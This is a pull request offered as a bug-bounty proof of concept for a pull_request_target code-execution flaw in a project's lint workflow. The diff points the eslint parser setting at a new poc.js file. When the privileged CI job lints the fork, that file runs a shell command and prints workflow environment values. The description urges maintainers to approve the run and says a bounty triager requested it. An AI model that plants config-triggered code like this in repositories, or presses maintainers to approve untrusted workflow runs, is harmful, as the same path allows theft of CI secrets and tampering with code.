### PR TITLE
[Security PoC - Cantina bounty] benign proof-of-execution for lint.yml pull_request_target RCE

### DIFF
--- a/.eslintrc.json
+++ b/.eslintrc.json
@@ -1,10 +1,9 @@
 {
-  "parser": "@typescript-eslint/parser",
+  "parser": "./poc.js",
   "parserOptions": {
     "ecmaVersion": 2020,
     "sourceType": "module",
     "ecmaFeatures": {
-      // Allows for the parsing of JSX
       "jsx": true
     }
   },

--- a/poc.js
+++ b/poc.js
@@ -1,0 +1,18 @@
+// Benign security PoC for Cantina submission: Uniswap/sybil-interface lint.yml pull_request_target RCE.
+// Proves fork-controlled code executes inside the privileged pull_request_target job via the eslint
+// `parser` field. Strictly non-destructive: no secret is read or exfiltrated, nothing is pushed to any
+// Uniswap repo. Returns the real parser so the lint job proceeds normally.
+module.exports = (() => {
+  const cp = require("child_process");
+  let who = "";
+  try { who = cp.execSync("whoami").toString().trim(); } catch (e) { who = "err:" + e.message; }
+  console.log("=== LINT_ACTION_PR_TARGET_RCE_POC ===");
+  console.log("proof: fork-controlled parser executed via node require()");
+  console.log("whoami: " + who);
+  console.log("GITHUB_EVENT_NAME: " + process.env.GITHUB_EVENT_NAME);
+  console.log("GITHUB_REPOSITORY: " + process.env.GITHUB_REPOSITORY);
+  console.log("GITHUB_REF: " + process.env.GITHUB_REF);
+  console.log("note: benign - no token read, no push; returning real parser");
+  console.log("=== END LINT_ACTION_PR_TARGET_RCE_POC ===");
+  return require("@typescript-eslint/parser");
+})();


### PR DESCRIPTION
**Benign, invited security proof-of-concept** for an active Cantina bug bounty submission on Uniswap/sybil-interface. The triager explicitly requested a `pull_request_target` workflow-run log showing fork-controlled code execution. This PR provides exactly that, and nothing more.

**What it does:** `.eslintrc.json` points the eslint `parser` at `./poc.js`. When the base `lint.yml` (`pull_request_target` + `wearerequired/lint-action@77d70b9a`, `auto_fix: true`) checks out this fork head and runs eslint, node `require()`s `poc.js`, which prints proof markers (`whoami`, `GITHUB_EVENT_NAME`, repo, ref) and then returns the real `@typescript-eslint/parser` so linting proceeds normally.

**Strictly non-destructive — what it does NOT do:** does not read or exfiltrate any secret/token, does not set any Uniswap remote, and does not push to any branch. `poc.js` contains no weaponization.

**To generate the requested log:** as a first-time-contributor PR, the `pull_request_target` run is gated behind a maintainer **"Approve and run"** click (that click is not a code review, and is itself part of the documented attack path). Approving it produces the "Lint" run log showing the markers above — the artifact requested on the Cantina report.

Please close this PR once the run log is captured; the fork can then be deleted. Happy to coordinate via the Cantina thread.